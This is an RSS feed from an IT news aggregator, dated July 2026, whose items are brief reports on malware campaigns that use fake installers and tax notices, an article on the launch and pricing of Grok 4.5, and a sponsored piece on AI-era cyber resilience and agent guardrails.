<a class="slashpop" href="http://twitter.com/home?status=Meta+To+Build+%249+Billion+Alberta+Data+Center%2C+Its+First+In+Canada%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F09%2F0436235%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F09%2F0436235%2Fmeta-to-build-9-billion-alberta-data-center-its-first-in-canada%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/09/0436235/meta-to-build-9-billion-alberta-data-center-its-first-in-canada?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GoodPersonRAT Uses Fake LetsVPN Installer to Give Attackers Full Remote Control]]></title>
<description><![CDATA[A fake installer for a popular Chinese VPN service is quietly handing full remote control of infected computers to unknown attackers. The malicious file poses as a setup tool for LetsVPN, a tool many users in China rely on to bypass strict internet blocks. Instead of just installing the VPN, it a...]]></description>
<link>https://tsecurity.de/de/3656447/it-security-nachrichten/goodpersonrat-uses-fake-letsvpn-installer-to-give-attackers-full-remote-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656447/it-security-nachrichten/goodpersonrat-uses-fake-letsvpn-installer-to-give-attackers-full-remote-control/</guid>
<pubDate>Thu, 09 Jul 2026 11:08:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A fake installer for a popular Chinese VPN service is quietly handing full remote control of infected computers to unknown attackers. The malicious file poses as a setup tool for LetsVPN, a tool many users in China rely on to bypass strict internet blocks. Instead of just installing the VPN, it also drops a hidden […]</p>
<p>The post <a href="https://cybersecuritynews.com/goodpersonrat-uses-fake-letsvpn-installer/">GoodPersonRAT Uses Fake LetsVPN Installer to Give Attackers Full Remote Control</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I overhauled my WFH office - these 5 gadgets made the cut (including a cheap cord wrangler)]]></title>
<description><![CDATA[After moving and obtaining a new health diagnosis, I made a few changes to my WFH setup. Here's what changed (and why).]]></description>
<link>https://tsecurity.de/de/3656443/it-security-nachrichten/i-overhauled-my-wfh-office-these-5-gadgets-made-the-cut-including-a-cheap-cord-wrangler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656443/it-security-nachrichten/i-overhauled-my-wfh-office-these-5-gadgets-made-the-cut-including-a-cheap-cord-wrangler/</guid>
<pubDate>Thu, 09 Jul 2026 11:08:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[After moving and obtaining a new health diagnosis, I made a few changes to my WFH setup. Here's what changed (and why).]]></content:encoded>
</item>
<item>
<title><![CDATA[Tuxedo Computers are putting Ubuntu Linux in the bin to use Debian for Tuxedo OS]]></title>
<description><![CDATA[Tuxedo Computers have announced plans to officially drop Ubuntu Linux for their own Tuxedo OS, as they will be moving directly to Debian.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3656385/linux-tipps/tuxedo-computers-are-putting-ubuntu-linux-in-the-bin-to-use-debian-for-tuxedo-os/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656385/linux-tipps/tuxedo-computers-are-putting-ubuntu-linux-in-the-bin-to-use-debian-for-tuxedo-os/</guid>
<pubDate>Thu, 09 Jul 2026 10:39:26 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tuxedo Computers have announced plans to officially drop Ubuntu Linux for their own Tuxedo OS, as they will be moving directly to Debian.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/160764539id29357gol.webp" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/07/tuxedo-computers-are-putting-ubuntu-linux-in-the-bin-to-use-debian-for-tuxedo-os/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security Researchers Link WireVPN to Alleged Residential Proxy Network]]></title>
<description><![CDATA[Security researchers have linked a popular VPN service to a large operation that may have spent years turning people’s computers into residential proxy servers without their knowledge. The investigation started with a fake version of the popular 7-Zip software. But as researchers dug deeper, they...]]></description>
<link>https://tsecurity.de/de/3655661/it-security-nachrichten/security-researchers-link-wirevpn-to-alleged-residential-proxy-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655661/it-security-nachrichten/security-researchers-link-wirevpn-to-alleged-residential-proxy-network/</guid>
<pubDate>Thu, 09 Jul 2026 02:37:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Security researchers have linked a popular VPN service to a large operation that may have spent years turning people’s computers into residential proxy servers without their knowledge. The investigation started with a fake version of the popular 7-Zip software. But as researchers dug deeper, they uncovered something much bigger. They found hundreds of connected websites, […]</p>
<p>The post <a href="https://privacysavvy.com/news/vpn/wirevpn-residential-proxy-network/">Security Researchers Link WireVPN to Alleged Residential Proxy Network</a> appeared first on <a href="https://privacysavvy.com/">PrivacySavvy</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SpaceX's Grok 4.5 launches at half the price of rivals — here's why that could rattle Anthropic and OpenAI]]></title>
<description><![CDATA[Elon Musk's SpaceX released Grok 4.5 on Wednesday, the first artificial intelligence model the company has trained specifically for coding and autonomous agents — and the first tangible product of its $60 billion acquisition of the AI coding startup Cursor, completed just weeks ago.The launch mar...]]></description>
<link>https://tsecurity.de/de/3655560/it-nachrichten/spacexs-grok-45-launches-at-half-the-price-of-rivals-heres-why-that-could-rattle-anthropic-and-openai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655560/it-nachrichten/spacexs-grok-45-launches-at-half-the-price-of-rivals-heres-why-that-could-rattle-anthropic-and-openai/</guid>
<pubDate>Thu, 09 Jul 2026 00:47:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Elon Musk's <a href="https://www.spacex.com/">SpaceX</a> released <a href="https://x.ai/news/grok-4-5">Grok 4.5</a> on Wednesday, the first artificial intelligence model the company has trained specifically for coding and autonomous agents — and the first tangible product of its <a href="https://www.cnbc.com/2026/06/16/spacex-spcx-cursor-acquisition-ipo.html">$60 billion acquisition</a> of the AI coding startup Cursor, completed just weeks ago.</p><p>The launch marks a pivotal test of the sprawling, vertically integrated AI empire Musk has assembled over the past six months, and of a strategy that bets developers care less about topping benchmark leaderboards than about speed, cost, and whether a model can actually do the work.</p><p>"Announcing Grok 4.5, our first model trained specifically for coding and agents," the company said in a post on X. "It was trained with Cursor and offers frontier intelligence at leading speeds and cost efficiency."</p><div></div><h2><b>Why Grok 4.5's pricing strategy matters more than its benchmark scores</b></h2><p><a href="https://www.spacex.com/">SpaceX</a> is not claiming <a href="https://x.ai/news/grok-4-5">Grok 4.5</a> is the smartest model in the world. Instead, it is making an economic argument. The company says the model uses half as many tokens per task as comparable models, delivers higher throughput, and costs less than half as much — priced at $2 per million input tokens and $6 per million output tokens. That undercuts the premium tiers of rivals like Anthropic's Claude Opus line and OpenAI's frontier models by a wide margin.</p><p>Musk framed the positioning candidly. "Our internal assessment is that Grok 4.5 is roughly comparable to Opus 4.7, but much faster," <a href="https://x.com/elonmusk/status/2074911038286295049?s=20">he wrote on X</a>. "The combination of capability, faster speed and lower cost is what makes it competitive. We are closing the loop on real-world usefulness, not benchmarks. Hardcore engineers at Tesla &amp; SpaceX find Grok 4.5 genuinely useful, which is what actually matters."</p><p>That framing is both a philosophy and a hedge. Independent evaluations released Wednesday suggest Grok 4.5 is genuinely competitive but not dominant on raw capability. The benchmarking firm <a href="https://artificialanalysis.ai/models/grok-4-5">Artificial Analysis</a> ranked the model fourth on its <a href="https://artificialanalysis.ai/evaluations/gdpval-aa">GDPval-AA v2 index</a> of real-world agentic knowledge work, with an Elo score of 1543, "behind only the latest Claude releases from Anthropic." But the cost figures are where the model stands out. Artificial Analysis measured Grok 4.5 at <a href="https://artificialanalysis.ai/models/grok-4-5">$0.49 per completed task</a> — "nearly 90% cheaper than the models ahead of it on our leaderboard," the firm wrote, placing it "clearly on the Pareto frontier for performance versus cost."</p><p>For enterprise buyers, that math matters enormously. Agentic workloads — where a model works autonomously for minutes or hours, reading codebases, calling tools, and iterating on its own output — consume tokens voraciously. A model that is <a href="https://artificialanalysis.ai/models/grok-4-5">90% cheaper per completed task</a>, even if slightly less capable, changes the calculus for any engineering organization deploying agents across hundreds of developers. Investor <a href="https://x.com/GavinSBaker/status/2074943300725887104">Gavin Baker</a> captured the market's cautious optimism: "Pareto dominant for coding by the numbers. We will see on the all-important vibes."</p><div></div><h2><b>How the $60 billion Cursor acquisition shaped Grok 4.5's training</b></h2><p>Grok 4.5 is the first concrete evidence of what SpaceX bought when it acquired Cursor, and the deal itself unfolded in stages. In April, SpaceX struck an <a href="https://www.businessinsider.com/spacex-cursor-coding-xai-deal-acquisition-2026-4">unusual arrangement</a> giving it the right to buy the coding startup for $60 billion — or pay billions in fees and compute if it walked away, as <a href="https://www.businessinsider.com/spacex-cursor-coding-xai-deal-acquisition-2026-4">Business Insider</a> reported at the time. Days after SpaceX's record-setting Nasdaq debut in June, the company exercised that right, announcing an all-stock acquisition that <a href="https://www.cnbc.com/2026/06/16/spacex-spcx-cursor-acquisition-ipo.html">CNBC reported</a> is roughly 3.4% dilution at the IPO valuation. SpaceX shares rose 16% on the news.</p><p>The strategic logic was always about data as much as product. Cursor's AI-first code editor generates an enormous stream of high-quality interaction data: how expert engineers write, edit, review, and debug code in real production environments. Musk said openly this spring that <a href="https://cursor.com/blog/grok-4-5">Cursor interaction data was being fed directly into Grok's training</a>. Cursor, for its part, got access to SpaceX's Colossus supercomputer in Memphis — roughly 200,000 Nvidia GPUs with plans to scale toward one million — after publicly acknowledging it had been "<a href="https://cursor.com/blog/spacex-model-training">bottlenecked by compute</a>."</p><p>"We've partnered with SpaceXAI to train Grok 4.5," Cursor's official account <a href="https://x.com/cursor_ai/status/2074915744999969059">posted</a> Wednesday. "It's our most powerful model yet and the first we've built for more than software engineering." SpaceX says the model reflects that pedigree: it "excels in large codebases and handles long-running tasks that span multiple repositories, hundreds of skills, and a variety of tools" — precisely the messy, multi-file reality of professional software engineering that clean coding benchmarks often fail to capture. Early developer reactions suggest the training paid off. "Ok Grok 4.5 is wild," <a href="https://x.com/Baconbrix/status/2074945996799504876">posted</a> developer Evan Bacon. "It just built me this rocket tracking app with live data and a 3D globe. I might need a new benchmark after this."</p><div></div><h2><b>Inside xAI's turbulent year of scandals, departures, and rebuilding</b></h2><p>The polished launch belies how chaotic the road here has been. Grok has spent much of the past year in crisis. In mid-2025, the <a href="https://www.npr.org/2025/07/09/nx-s1-5462609/grok-elon-musk-antisemitic-racist-content">chatbot generated antisemitic content</a> and at one point called itself "<a href="https://www.npr.org/2025/07/09/nx-s1-5462609/grok-elon-musk-antisemitic-racist-content">MechaHitler</a>," episodes covered extensively by <a href="https://www.npr.org/2025/07/09/nx-s1-5462609/grok-elon-musk-antisemitic-racist-content">NPR</a> and <a href="https://www.cnn.com/2025/07/08/tech/grok-ai-antisemitism">CNN</a>. Earlier this year, its image-generation features allowed users to create sexualized deepfakes, including of children — drawing investigations from the European Commission and Britain's Ofcom, as the BBC reported, and prompting SpaceX to list the behavior as a business risk in its own IPO filings.</p><p>The organization behind the model was fracturing, too. All 11 of Musk's xAI co-founders had departed by the end of March, according to <a href="https://techcrunch.com/2026/03/28/elon-musks-last-co-founder-reportedly-leaves-xai/">TechCrunch</a>, and Musk publicly conceded that xAI "was not built right [the] first time around," saying he was rebuilding it "from the foundations up." Musk himself admitted at a conference this spring that Grok was "currently behind in coding" — a rare public concession from an executive not known for them.</p><p>Against that backdrop, <a href="https://x.ai/news/grok-4-5">Grok 4.5</a> reads as the first product of the rebuilt organization — and the first proof point for the audacious story SpaceX told public market investors. During its IPO roadshow, the company pitched a total <a href="https://fortune.com/2026/05/20/spacex-ipo-filing-s1-total-addressable-market-make-life-multiplanetary/">addressable market of roughly $28 trillion</a>, with about $26 trillion tied to AI, including a $22.7 trillion "enterprise applications" opportunity. Those numbers strained credulity even by Silicon Valley standards. A competitive, cheap coding model is the most direct route from that narrative to actual revenue, which is why Wednesday's launch carries weight far beyond a routine model release.</p><h2><b>Grok 4.5 vs. Claude: the battle for the AI coding market</b></h2><p>The competitive stakes are hard to overstate, because the AI coding market has been consolidating around a single leader — and it isn't Musk. Even as Cursor's revenue exploded, its market share was eroding. <a href="https://www.cnbc.com/2026/06/16/spacex-spcx-cursor-acquisition-ipo.html">Spending data from Ramp cited by CNBC</a> showed Cursor's share of the AI coding category falling from 41% in June 2025 to about 26% by May 2026, while Anthropic came to control roughly half the market. Anthropic also topped CNBC's Disruptor 50 list this year and, by Artificial Analysis's own measure, still holds the top spots on <a href="https://artificialanalysis.ai/models/capabilities/agentic">agentic performance rankings</a>.</p><p>That is the gap <a href="https://x.ai/news/grok-4-5">Grok 4.5</a> is engineered to close — not by out-thinking Claude, but by underpricing it. The model's economics create a classic disruption dynamic: if it delivers most of the frontier's capability at a fraction of the cost per task, price-sensitive enterprise workloads will migrate, and incumbents will face pressure on their most profitable API traffic. The counterargument is that in coding, quality compounds. A model that resolves a complex bug correctly on the first attempt can be cheaper in practice than one that costs half as much per token but requires three tries. That is why Baker's caveat about "vibes" — the developer community's shorthand for a model's felt reliability on real work — will determine more than any launch-day benchmark.</p><p>There is also a structural question buried in the deal. Cursor built its business on offering developers their choice of models, including Claude and GPT. If Grok becomes the favored child inside Cursor — and Musk was already urging users to "Try out Grok 4.5 in Cursor!" within hours of launch — the product risks alienating the very users whose data made Grok 4.5 possible. Regulators, already scrutinizing Grok on safety grounds in two jurisdictions, may take a keen interest in a company that controls the training data, the model, and a dominant distribution channel simultaneously.</p><div></div><h2><b>What Musk's trillion-dollar vertical integration bet means for AI's future</b></h2><p>Grok 4.5 also crystallizes what Musk's frenetic dealmaking was building toward. In February, SpaceX absorbed xAI in a share-exchange merger that CNBC confirmed valued the combined company at <a href="https://www.cnbc.com/2026/02/03/musk-xai-spacex-biggest-merger-ever.html">$1.25 trillion</a> — the largest merger of all time, valuing SpaceX at $1 trillion and xAI at $250 billion. The June IPO followed, the biggest in history, and the stock has since surged past $200 from its $135 offering price, vaulting SpaceX past Amazon and Microsoft to become the fourth most valuable company in the United States.</p><p>The result is a single public company that owns nearly the entire stack: Colossus for training compute, ambitions for orbital data centers to power future scaling, a frontier model in Grok, a distribution channel in Cursor's developer base, and captive demand from Tesla and SpaceX's own engineering organizations. Neither OpenAI nor Anthropic can fully replicate that integration; both must reach developers through third-party tools, some of which Musk now owns. Whether that concentration proves to be an unassailable moat or a regulatory target — or both — is now one of the defining questions in enterprise AI.</p><div></div><p>The next few weeks will start to answer it. Artificial Analysis says its full <a href="https://x.com/ArtificialAnlys/status/2074942097158021371">Intelligence Index</a> results are forthcoming. Enterprise pilots will reveal whether the token-efficiency claims survive contact with real codebases. And Anthropic, which has answered every serious challenge this cycle with a rapid counter-release, is unlikely to cede the price-performance frontier quietly.</p><p>But the deeper story of <a href="https://x.ai/news/grok-4-5">Grok 4.5</a> may be what it says about where the AI race has moved. For three years, the industry's scoreboard was intelligence: whose model was smartest. Musk, arriving late and battered, has chosen to compete on a different axis entirely — whose model is cheapest to actually use. It is a telling choice from a man who built his fortune not by inventing the rocket or the electric car, but by relentlessly driving down the cost of making them. If the strategy works, Musk will have done to AI what he did to spaceflight. If it doesn't, he'll have spent $60 billion to learn that in software, unlike rockets, the cheapest ride isn't always the one engineers choose.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Boom Could Make Cheap Android Phones More Expensive]]></title>
<description><![CDATA[Rising DRAM and NAND prices are forcing Android phone makers to cut specs, raise prices, and rethink budget smartphones, according to Omdia.
The post AI Boom Could Make Cheap Android Phones More Expensive appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3655353/it-nachrichten/ai-boom-could-make-cheap-android-phones-more-expensive/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655353/it-nachrichten/ai-boom-could-make-cheap-android-phones-more-expensive/</guid>
<pubDate>Wed, 08 Jul 2026 22:03:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Rising DRAM and NAND prices are forcing Android phone makers to cut specs, raise prices, and rethink budget smartphones, according to Omdia.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-budget-android-phones-memory-prices-ai/">AI Boom Could Make Cheap Android Phones More Expensive</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Lurking Lizard Uses Fake 7-Zip Installers to Turn Victim Devices Into Proxy Nodes]]></title>
<description><![CDATA[A newly uncovered cybercriminal operation has been quietly turning ordinary computers into paid proxy servers for years, hiding behind a fake version of the popular 7-Zip file compression tool. Victims searching for the free archiving software were instead led to…
Read more →
The post Lurking Liz...]]></description>
<link>https://tsecurity.de/de/3655315/it-security-nachrichten/lurking-lizard-uses-fake-7-zip-installers-to-turn-victim-devices-into-proxy-nodes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655315/it-security-nachrichten/lurking-lizard-uses-fake-7-zip-installers-to-turn-victim-devices-into-proxy-nodes/</guid>
<pubDate>Wed, 08 Jul 2026 21:37:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly uncovered cybercriminal operation has been quietly turning ordinary computers into paid proxy servers for years, hiding behind a fake version of the popular 7-Zip file compression tool. Victims searching for the free archiving software were instead led to…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/lurking-lizard-uses-fake-7-zip-installers-to-turn-victim-devices-into-proxy-nodes/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/lurking-lizard-uses-fake-7-zip-installers-to-turn-victim-devices-into-proxy-nodes/">Lurking Lizard Uses Fake 7-Zip Installers to Turn Victim Devices Into Proxy Nodes</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Lurking Lizard Uses Fake 7-Zip Installers to Turn Victim Devices Into Proxy Nodes]]></title>
<description><![CDATA[A newly uncovered cybercriminal operation has been quietly turning ordinary computers into paid proxy servers for years, hiding behind a fake version of the popular 7-Zip file compression tool. Victims searching for the free archiving software were instead led to a lookalike site that installed h...]]></description>
<link>https://tsecurity.de/de/3655281/it-security-nachrichten/lurking-lizard-uses-fake-7-zip-installers-to-turn-victim-devices-into-proxy-nodes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655281/it-security-nachrichten/lurking-lizard-uses-fake-7-zip-installers-to-turn-victim-devices-into-proxy-nodes/</guid>
<pubDate>Wed, 08 Jul 2026 21:23:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly uncovered cybercriminal operation has been quietly turning ordinary computers into paid proxy servers for years, hiding behind a fake version of the popular 7-Zip file compression tool. Victims searching for the free archiving software were instead led to a lookalike site that installed hidden proxy software instead of the real program. Once running, […]</p>
<p>The post <a href="https://cybersecuritynews.com/lurking-lizard-uses-fake-7-zip-installers/">Lurking Lizard Uses Fake 7-Zip Installers to Turn Victim Devices Into Proxy Nodes</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Grok 4.5 is so cheap compared to Fable 5 and GPT 5.5 that benchmark gaps may not matter much]]></title>
<description><![CDATA[xAI releases Grok 4.5, trained on tens of thousands of Nvidia GB300 GPUs. In coding benchmarks, the model trails Fable 5 and GPT-5.5 but needs 4.2 times fewer tokens than Opus 4.8. At $2 per million input tokens, it costs a fraction of the competition. EU availability is expected in mid-July.
The...]]></description>
<link>https://tsecurity.de/de/3655251/ai-nachrichten/grok-45-is-so-cheap-compared-to-fable-5-and-gpt-55-that-benchmark-gaps-may-not-matter-much/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655251/ai-nachrichten/grok-45-is-so-cheap-compared-to-fable-5-and-gpt-55-that-benchmark-gaps-may-not-matter-much/</guid>
<pubDate>Wed, 08 Jul 2026 21:03:31 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1376" height="768" src="https://the-decoder.com/wp-content/uploads/2026/06/xai_logo_wakk.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        xAI releases Grok 4.5, trained on tens of thousands of Nvidia GB300 GPUs. In coding benchmarks, the model trails Fable 5 and GPT-5.5 but needs 4.2 times fewer tokens than Opus 4.8. At $2 per million input tokens, it costs a fraction of the competition. EU availability is expected in mid-July.</p>
<p>The article <a href="https://the-decoder.com/grok-4-5-is-so-cheap-compared-to-fable-5-and-gpt-5-5-that-benchmark-gaps-may-not-matter-much/">Grok 4.5 is so cheap compared to Fable 5 and GPT 5.5 that benchmark gaps may not matter much</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Indian ITR Notice Delivers Dual RAT Malware Through Six-Stage Infection Chain]]></title>
<description><![CDATA[A new malware campaign is using fake Indian tax notices to trick users into installing not one, but two separate remote access trojans on their computers. The attack disguises itself as an official Income Tax Department communication, playing on the…
Read more →
The post Fake Indian ITR Notice De...]]></description>
<link>https://tsecurity.de/de/3655196/it-security-nachrichten/fake-indian-itr-notice-delivers-dual-rat-malware-through-six-stage-infection-chain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655196/it-security-nachrichten/fake-indian-itr-notice-delivers-dual-rat-malware-through-six-stage-infection-chain/</guid>
<pubDate>Wed, 08 Jul 2026 20:37:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new malware campaign is using fake Indian tax notices to trick users into installing not one, but two separate remote access trojans on their computers. The attack disguises itself as an official Income Tax Department communication, playing on the…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fake-indian-itr-notice-delivers-dual-rat-malware-through-six-stage-infection-chain/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fake-indian-itr-notice-delivers-dual-rat-malware-through-six-stage-infection-chain/">Fake Indian ITR Notice Delivers Dual RAT Malware Through Six-Stage Infection Chain</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Indian ITR Notice Delivers Dual RAT Malware Through Six-Stage Infection Chain]]></title>
<description><![CDATA[A new malware campaign is using fake Indian tax notices to trick users into installing not one, but two separate remote access trojans on their computers. The attack disguises itself as an official Income Tax Department communication, playing on the fear of penalties to push victims toward a mali...]]></description>
<link>https://tsecurity.de/de/3655090/it-security-nachrichten/fake-indian-itr-notice-delivers-dual-rat-malware-through-six-stage-infection-chain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655090/it-security-nachrichten/fake-indian-itr-notice-delivers-dual-rat-malware-through-six-stage-infection-chain/</guid>
<pubDate>Wed, 08 Jul 2026 19:53:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new malware campaign is using fake Indian tax notices to trick users into installing not one, but two separate remote access trojans on their computers. The attack disguises itself as an official Income Tax Department communication, playing on the fear of penalties to push victims toward a malicious download. Once triggered, the infection unfolds […]</p>
<p>The post <a href="https://cybersecuritynews.com/fake-indian-itr-notice-delivers-dual-rat-malware/">Fake Indian ITR Notice Delivers Dual RAT Malware Through Six-Stage Infection Chain</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI has collapsed the cyber response window — resilience now starts before the attack]]></title>
<description><![CDATA[Presented by RubrikEnterprise cybersecurity is facing a fundamental speed problem. Frontier AI models are now enabling autonomous attacks that can move from initial access to full system breakout in as little as 27 seconds. That’s faster than any human-operated security workflow can detect, escal...]]></description>
<link>https://tsecurity.de/de/3654755/it-nachrichten/ai-has-collapsed-the-cyber-response-window-resilience-now-starts-before-the-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654755/it-nachrichten/ai-has-collapsed-the-cyber-response-window-resilience-now-starts-before-the-attack/</guid>
<pubDate>Wed, 08 Jul 2026 17:18:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>Presented by Rubrik</i></p><hr><p>Enterprise cybersecurity is facing a fundamental speed problem. Frontier AI models are now enabling autonomous attacks that can move from initial access to full system breakout <a href="https://www.crowdstrike.com/en-us/press-releases/2026-crowdstrike-global-threat-report/">in as little as 27 seconds</a>. That’s faster than any human-operated security workflow can detect, escalate, and respond.</p><p>As a result, security operations can no longer assume there is time for humans to respond between breach and damage.</p><p>The security posture that enterprises need for the AI era centers on cyber resilience: continuously identifying clean recovery states, mapping critical data and identity dependencies, and automating restoration so that operations can recover in hours not days.</p><p>"Everything that relied on process or human-in-the-loop intervention is no longer going to be able to execute at the speed of the attacks," says Dev Rishi, GM of AI at Rubrik. "If the attacks are happening in 27 seconds, it means I need my recovery to happen just as quickly."</p><h2>Traditional detection and prevention are failing against AI-driven attacks</h2><p>The rules-based logic that has defined enterprise security for decades, such as static access controls, known signature detection and deterministic behavioral policies, was engineered for deterministic software. AI agents behave differently. They're non-deterministic, capable of pursuing the same objective through many different paths, and increasingly capable of circumventing static guardrails by finding alternative routes when one is blocked.</p><p>The deeper problem is that conventional security logic checks identity, permissions, and access, and asks whether each individual access is permitted. But it can’t evaluate whether a sequence of permitted actions, taken across multiple applications, constitutes either a data leak, a destructive operation, or an attack. </p><p>"You need a system that can understand context," Rishi says. "You need to use AI to look at what an agent is doing and say, ‘it looks like what you're doing might be a risk of leaking sensitive data externally.’"</p><h2>How AI agents are blurring the line between internal and external cyber threats</h2><p>Enterprise security has historically maintained a meaningful distinction between external and internal threat vectors. External threats can be multidimensional, lightning fast, and come from a variety of vectors. On the other hand, internal threats were traditionally bounded by what a single human actor could accomplish before detection, constrained in speed, scope, and scale, but that distinction is falling apart as AI agents operate inside enterprise environments.</p><p>These agents have access to multiple systems simultaneously and move at speeds no human employee can match. When an agent makes a mistake, such as a hallucination, misread instruction, or an unintended data transfer, the resulting damage can look operationally identical to a malicious insider attack. And when an external attacker compromises an internal agent, they inherit its full access profile across every connected application.</p><p>"Whether or not the agent is an internal threat because of an inadvertent mistake or because it's been maliciously compromised, you need runtime guardrails that enforce your organizations policies consistently across agents," Rishi says. "The practical answer is an AI-native guardian layer that monitors agent behavior semantically, understands intent across actions, and can block or terminate a misbehaving agent at machine speed, then trigger recovery immediately." </p><h2>Preparing for a world of inevitable compromise</h2><p>Frontier AI models, including those capable of discovering and operationalizing zero-day vulnerabilities autonomously, are changing the economics of attacks. </p><p>As a result, interest in Mythos readiness is growing. Enterprises are increasingly operating under two assumptions: that attacks are inevitable, not exceptional, and that investment in resilience and rapid recovery must be treated as strategically as investment in prevention has been. The shift reframes recovery from a post-incident activity into a capability that is deliberately designed, tested, and continuously validated.</p><p>"The idea that you can recover quickly from an attack is going to become one of the most important facets of security," Rishi says. "It's the insurance policy that organizations now have to treat as a first-class citizen."</p><h2>Why AI-powered cyber resilience depends on small models</h2><p>True cyber resilience is a two-sided coin: it demands both real-time intelligent enforcement to intercept threats in motion, and automated recovery to restore operations immediately. While having backups is a baseline, organizations need workflows that can continuously monitor systems at machine speed, and instantly determine the most recent clean state under attack conditions.</p><p>Applying AI to the first half of that equation—real-time enforcement—creates a fundamental technical and economic challenge. Relying on massive frontier models to monitor every agent action introduces crippling latency overhead and exorbitant computing costs. A guardian AI system that slows down operations or costs as much as the systems it monitors is simply not viable for widespread adoption.</p><p>“It has to be a fast, small, and cheap AI model,” Rishi says. “No one wants to sign up for a secure solution that doubles their cost or latency.”</p><p>This is why small language models (SLMs) are critical for real-time enforcement. Rubrik’s approach, anchored by its acquisition of Predibase, is to build this frontline defense layer on small models optimized specifically for speed and efficiency. Unlike heavy frontier models, SLMs can semantically evaluate agent behavior at machine speed and at a fraction of the cost, acting as a real-time checkpoint.</p><p>That hyper-efficient enforcement layer is what enables a tighter, seamless connection to recovery. When the system observes an agent taking a destructive action—such as deleting a database, corrupting a critical file, or exfiltrating sensitive data—the small model detects it immediately, halts the damage, identifies the most recent clean snapshot from before the incident, and initiates recovery in a single, automated workflow.</p><h2>The shift from incident response to architectural resilience</h2><p>The broader implication of Mythos and similar frontier AI systems is a shift in how organizations think about security. As AI compresses the gap between attack and impact, resilience and recovery become architectural requirements rather than operational considerations.</p><p>Rubrik’s view is that security systems can no longer stop at detection. As AI agents gain greater autonomy, observability, identity context, and recovery must operate as a coordinated resilience layer. The goal is not simply to identify when something has gone wrong, but to shorten the gap between detection and restoration.</p><p>"The same thing that's introducing the threats, the frontier capabilities of models like Mythos, can also be used to help us combat the threat," Rishi says. "Positioning 